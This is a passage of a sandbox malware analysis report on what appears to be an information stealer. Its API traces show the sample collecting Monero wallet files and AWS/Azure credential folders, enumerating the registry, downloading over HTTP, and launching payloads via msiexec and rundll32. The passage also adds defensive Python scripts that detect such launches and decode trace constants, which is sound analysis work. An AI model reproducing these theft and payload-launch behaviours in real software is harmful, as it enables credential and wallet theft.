                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054CF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0054D0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0054D0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D208
                      • lstrcat.KERNEL32(?,00561478), ref: 0054D217
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D22A
                      • lstrcat.KERNEL32(?,0056147C), ref: 0054D239
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D24C
                      • lstrcat.KERNEL32(?,00561480), ref: 0054D25B
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D26E
                      • lstrcat.KERNEL32(?,00561484), ref: 0054D27D
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D290
                      • lstrcat.KERNEL32(?,00561488), ref: 0054D29F
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D2B2
                      • lstrcat.KERNEL32(?,0056148C), ref: 0054D2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D2D4
                      • lstrcat.KERNEL32(?,00561490), ref: 0054D2E3
                        • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                        • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                      • lstrlen.KERNEL32(?), ref: 0054D32A
                      • lstrlen.KERNEL32(?), ref: 0054D339
                        • Part of subcall function 0055AA70: StrCmpCA.SHLWAPI(01028A68,0054A7A7,?,0054A7A7,01028A68), ref: 0055AA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 0054D3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: 49d962d7b9af3f22f201e5e25406f18e3787043eb4719ac6b23672f307a50a2a
                      • Instruction ID: b935c6ed5079849d7691eaae95da84aee22555b477b62024906217a08e8eabf1
                      • Opcode Fuzzy Hash: 49d962d7b9af3f22f201e5e25406f18e3787043eb4719ac6b23672f307a50a2a
                      • Instruction Fuzzy Hash: BCE15571950109ABDB04EBA0DD69EEE7B78BF54302F104156F507A7091EE38BE09CB76
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0102DAD8,00000000,?,0056144C,00000000,?,?), ref: 0054CA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0054CA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0054CA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0054CAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0054CAD9
                      • StrStrA.SHLWAPI(?,0102DAF0,00560B52), ref: 0054CAF7
                      • StrStrA.SHLWAPI(00000000,0102DB20), ref: 0054CB1E
                      • StrStrA.SHLWAPI(?,0102E468,00000000,?,00561458,00000000,?,00000000,00000000,?,01028A58,00000000,?,00561454,00000000,?), ref: 0054CCA2
                      • StrStrA.SHLWAPI(00000000,0102E6C8), ref: 0054CCB9
                        • Part of subcall function 0054C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                        • Part of subcall function 0054C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                      • StrStrA.SHLWAPI(?,0102E6C8,00000000,?,0056145C,00000000,?,00000000,010288A8), ref: 0054CD5A
                      • StrStrA.SHLWAPI(00000000,01028B58), ref: 0054CD71
                        • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                        • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                        • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                      • lstrlen.KERNEL32(00000000), ref: 0054CE44
                      • CloseHandle.KERNEL32(00000000), ref: 0054CE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: 5607a3880b307ee113dbfa83c01524da6f3c9f3b9ead4ad25a06b41f897d51db
                      • Instruction ID: 2c332d81e33348ccf4f4476b9629f8defb3a1413796990370aadc8ed095f42cb
                      • Opcode Fuzzy Hash: 5607a3880b307ee113dbfa83c01524da6f3c9f3b9ead4ad25a06b41f897d51db
                      • Instruction Fuzzy Hash: 3FE12271D00109ABDB14EBA0DCA9FEE7B78BF94301F50425AF50663191EF346A4ECB65
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • RegOpenKeyExA.ADVAPI32(00000000,0102BD10,00000000,00020019,00000000,005605B6), ref: 005583A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                      • wsprintfA.USER32 ref: 00558459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                      • Instruction ID: 4db97ab99808f7c869fc04b5572e0e5550160f43435c2e3f83d23996b033f30c
                      • Opcode Fuzzy Hash: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                      • Instruction Fuzzy Hash: 65813E7191011CABEB24DB50CC95FEA7BB8FF48701F10869AE509A6180DF746B89CFA5
                      APIs
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00554DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 00554DCD
                        • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                        • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                      • lstrcat.KERNEL32(?,00000000), ref: 00554E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 00554E59
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                        • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                        • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                      • lstrcat.KERNEL32(?,00000000), ref: 00554EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00554EE5
                        • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549B0
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,005608D2), ref: 005549C5
                        • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549E2
                        • Part of subcall function 00554910: PathMatchSpecA.SHLWAPI(?,?), ref: 00554A1E
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,0102FC10), ref: 00554A4A
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FF8), ref: 00554A5C
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A70
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FFC), ref: 00554A82
                        • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A96
                        • Part of subcall function 00554910: CopyFileA.KERNEL32(?,?,00000001), ref: 00554AAC
                        • Part of subcall function 00554910: DeleteFileA.KERNEL32(?), ref: 00554B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: 5e36878ddba73137a2d92696bc24ba1f90c23952e814f20dcd28ba3e36420186
                      • Instruction ID: 7a919fea5a9b5e9bfef41ce02fd9e11c458469b056f20621664041a9f4bf3d11
                      • Opcode Fuzzy Hash: 5e36878ddba73137a2d92696bc24ba1f90c23952e814f20dcd28ba3e36420186
                      • Instruction Fuzzy Hash: 3241A2BA94020967DB10F760EC5BFED3B38BB64705F404595B589660C2FEB457CC8BA2
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0055906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true (associated dumps identical to those listed for the first function in this section)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                      • Instruction ID: 93335c7fb11d32f14c70677f2e42e07288529cfa08e4425dbb2ee3daccdebc28
                      • Opcode Fuzzy Hash: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                      • Instruction Fuzzy Hash: C4712F71940209EBDB04DFE4DC99FEEBBB8BF88301F108509F515A7290DB38A945CB65
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 005531C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 0055335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 005534EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true (associated dumps identical to those listed for the first function in this section)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                      • Instruction ID: a302a5010253c0b834bd29173f21d2f69d1744a6aa28ac238cf985029e935c15
                      • Opcode Fuzzy Hash: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                      • Instruction Fuzzy Hash: 661212718101199ADB05EBA0DCAAFEEBB78BF54301F50425AF90676191EF342B4ECF52
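The three ShellExecuteEx calls above, together with the string IDs `C:\Windows\system32\msiexec.exe`, `/i "`, ` /passive`, `C:\Windows\system32\rundll32.exe`, `.msi` and `.dll`, are the sample's payload launcher: a downloaded file is handed to msiexec (`/i "<file>" /passive`) or to rundll32 depending on its extension. The argument 0000003C is the cbSize field of SHELLEXECUTEINFOA (60 bytes on 32-bit Windows), which is also where the `<` string ID comes from. Added example, not part of the report and not the sample's code: a Python detector that applies that launch pattern to process-creation records. The record layout (Image|ParentImage|CommandLine), the sample records and the list of user-writable locations are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation records (Image|ParentImage|CommandLine); invented for this
# example, not taken from the sandbox run.
SAMPLE_EVENTS = [
    r'C:\Windows\System32\msiexec.exe|C:\Users\u\AppData\Local\Temp\file.exe|'
    r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\AppData\Local\Temp\pkg.msi" /passive',
    r'C:\Windows\System32\rundll32.exe|C:\Users\u\AppData\Local\Temp\file.exe|'
    r'C:\Windows\system32\rundll32.exe "C:\Users\u\AppData\Roaming\upd.dll"',
    r'C:\Windows\System32\msiexec.exe|C:\Windows\explorer.exe|'
    r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi"',
    r'C:\Windows\System32\rundll32.exe|C:\Windows\explorer.exe|'
    r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL',
]

# Locations a standard user can write to (assumed list); packages and DLLs launched from here
# by the two Windows-signed hosts are what the traced launcher produces.
USER_WRITABLE = re.compile(r'\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\', re.IGNORECASE)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')
DRIVE_PATH = re.compile(r'^[A-Za-z]:\\')


@dataclass
class Finding:
    index: int
    rule: str
    path: str


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line into tokens, honouring double quotes (simplified CommandLineToArgv)."""
    return [q or b for q, b in TOKEN.findall(cmdline)]


def classify(index: int, record: str) -> Optional[Finding]:
    parts = record.split('|', 2)
    if len(parts) != 3:
        return None
    image, _parent, cmdline = parts
    host = image.rsplit('\\', 1)[-1].lower()
    toks = tokens(cmdline)
    switches = {t.lower() for t in toks if t.startswith('/')}
    for t in toks:
        if not DRIVE_PATH.match(t) or not USER_WRITABLE.search(t):
            continue
        # msiexec /i "<pkg>" /passive: the quiet install the trace builds for .msi payloads
        if host == 'msiexec.exe' and {'/i', '/passive'} <= switches and t.lower().endswith('.msi'):
            return Finding(index, 'msiexec /i /passive on a package in a user-writable path', t)
        # rundll32 "<dll>": the loader path the trace builds for .dll payloads
        if host == 'rundll32.exe' and t.lower().endswith('.dll'):
            return Finding(index, 'rundll32 loading a DLL from a user-writable path', t)
    return None


def scan(records) -> List[Finding]:
    return [f for f in (classify(i, r) for i, r in enumerate(records)) if f is not None]


if __name__ == '__main__':
    for f in scan(SAMPLE_EVENTS):
        print(f'[{f.index}] {f.rule}: {f.path}')
```

The two legitimate records (an installer under Program Files, a shell32 control panel call) fall through; only the Temp and Roaming launches are returned. Parent-process context is carried in the record but not used, so the rule stays usable on telemetry that lacks it.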
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                        • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0102FC80), ref: 00546303
                        • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                        • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0102F320,00000000,00000000,00400100,00000000), ref: 00546385
                        • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                        • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                      • lstrlen.KERNEL32(00000000), ref: 0055532F
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                      • lstrlen.KERNEL32(00000000), ref: 00555383
                      • lstrlen.KERNEL32(00000000), ref: 005553AE
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true (associated dumps identical to those listed for the first function in this section)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 0f8b15ce47b3b9c16b5347a7c6e97546ee7e684227a37ff0cb0be548ad81aede
                      • Instruction ID: 012ba63825d2e8538ef0ddddf5c5deebe3d58c94de7becff272b23bdfae9875a
                      • Opcode Fuzzy Hash: 0f8b15ce47b3b9c16b5347a7c6e97546ee7e684227a37ff0cb0be548ad81aede
                      • Instruction Fuzzy Hash: 8F510C3091014AABDB14EF60C9BAAED7F79BF90302F504119FC065A592EF346B49CB66
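The downloader subcall 00546280 above is plain WinINet: InternetOpenA with access type 00000001, InternetConnectA with service 00000003, HttpOpenRequestA for GET with flags 00400100, InternetSetOptionA with option 0000001F and a 4-byte buffer, HttpSendRequestA, then a StrCmpCA of the reply against `ERROR`. The report prints those arguments as raw hex. Added example, not from the report and not Joe Sandbox code: a Python parser for the `APIs` line format used throughout this section that turns each line into a structured call record and names the WinINet, CSIDL and registry constants from the public SDK headers. The TRACE input is copied from lines in this section. The value written through INTERNET_OPTION_SECURITY_FLAGS is not visible in the trace (`?`), so the example names the option but does not guess the flags.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

# Constructed input: API lines copied from the "APIs" lists of functions in this section
# (WinINet downloader, C2 response check, CSIDL lookup, HKCU registry reader).
TRACE = """\
• Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
• Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
• Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0102F320,00000000,00000000,00400100,00000000), ref: 00546385
• Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
• Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
• wsprintfA.USER32 ref: 0055492C
"""

LINE_RE = re.compile(
    r'^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?'
    r'(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$')
HEX_RE = re.compile(r'^-?[0-9A-F]{8}$')

Arg = Union[int, str, None]  # int: 32-bit value (immediate or pointer, the report does not distinguish); None: '?'


@dataclass
class Call:
    api: str
    module: str
    args: List[Arg]
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # set when the line reads "Part of subcall function X"


def _arg(tok: str) -> Arg:
    t = tok.strip()
    if t == '?':
        return None
    if HEX_RE.match(t):
        return int(t, 16) & 0xFFFFFFFF  # "-00000001" is how the report prints 0xFFFFFFFF
    return tok                           # string literal resolved by the plugin (GET, ERROR, \.aws\ ...)


def parse(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw, sub = m['args'], m['sub']
        # a literal containing a comma would be split here; none occurs in this report
        args = [_arg(a) for a in raw.split(',')] if raw else []
        calls.append(Call(m['api'], m['mod'], args, int(m['ref'], 16), int(sub, 16) if sub else None))
    return calls


# Constant tables (wininet.h, shlobj.h, winreg.h) for arguments the trace leaves as raw numbers.
ACCESS_TYPES = {0: 'INTERNET_OPEN_TYPE_PRECONFIG', 1: 'INTERNET_OPEN_TYPE_DIRECT', 3: 'INTERNET_OPEN_TYPE_PROXY'}
SERVICES = {1: 'INTERNET_SERVICE_FTP', 3: 'INTERNET_SERVICE_HTTP'}
HTTP_FLAGS = {0x80000000: 'INTERNET_FLAG_RELOAD', 0x04000000: 'INTERNET_FLAG_NO_CACHE_WRITE',
              0x00800000: 'INTERNET_FLAG_SECURE', 0x00400000: 'INTERNET_FLAG_KEEP_CONNECTION',
              0x00200000: 'INTERNET_FLAG_NO_AUTO_REDIRECT', 0x00080000: 'INTERNET_FLAG_NO_COOKIES',
              0x00002000: 'INTERNET_FLAG_IGNORE_CERT_DATE_INVALID', 0x00001000: 'INTERNET_FLAG_IGNORE_CERT_CN_INVALID',
              0x00000200: 'INTERNET_FLAG_NO_UI', 0x00000100: 'INTERNET_FLAG_PRAGMA_NOCACHE'}
INET_OPTIONS = {2: 'INTERNET_OPTION_CONNECT_TIMEOUT', 6: 'INTERNET_OPTION_RECEIVE_TIMEOUT', 31: 'INTERNET_OPTION_SECURITY_FLAGS'}
CSIDL = {0x05: 'CSIDL_PERSONAL', 0x10: 'CSIDL_DESKTOPDIRECTORY', 0x1A: 'CSIDL_APPDATA', 0x1C: 'CSIDL_LOCAL_APPDATA', 0x28: 'CSIDL_PROFILE'}
HKEYS = {0x80000000: 'HKEY_CLASSES_ROOT', 0x80000001: 'HKEY_CURRENT_USER', 0x80000002: 'HKEY_LOCAL_MACHINE', 0x80000003: 'HKEY_USERS'}
SAM = {0x20019: 'KEY_READ', 0x20119: 'KEY_READ|KEY_WOW64_64KEY', 0x20006: 'KEY_WRITE', 0xF003F: 'KEY_ALL_ACCESS'}


def _bits(value: Arg, table: Dict[int, str]) -> List[str]:
    """Names of the set bits, highest first, plus any remainder the table does not cover."""
    if not isinstance(value, int):
        return []
    names = [n for bit, n in sorted(table.items(), reverse=True) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    return names + ([f'0x{rest:08X}'] if rest else [])


DECODERS = {
    'InternetOpenA':      lambda a: {'access_type': ACCESS_TYPES.get(a[1], a[1])},
    'InternetConnectA':   lambda a: {'service': SERVICES.get(a[5], a[5])},
    'HttpOpenRequestA':   lambda a: {'verb': a[1], 'flags': _bits(a[6], HTTP_FLAGS)},
    'InternetSetOptionA': lambda a: {'option': INET_OPTIONS.get(a[1], a[1])},
    'SHGetFolderPathA':   lambda a: {'csidl': CSIDL.get(a[1], a[1])},
    'RegOpenKeyExA':      lambda a: {'root': HKEYS.get(a[0], a[0]), 'access': SAM.get(a[3], a[3])},
}


def decode(call: Call) -> Dict[str, object]:
    """Symbolic names for the numeric arguments of the APIs above; {} for anything else."""
    fn = DECODERS.get(call.api)
    try:
        return fn(call.args) if fn else {}
    except IndexError:
        return {}


if __name__ == '__main__':
    for c in parse(TRACE):
        print(f'{c.ref:08X} {c.api:<20} {decode(c)}')
```

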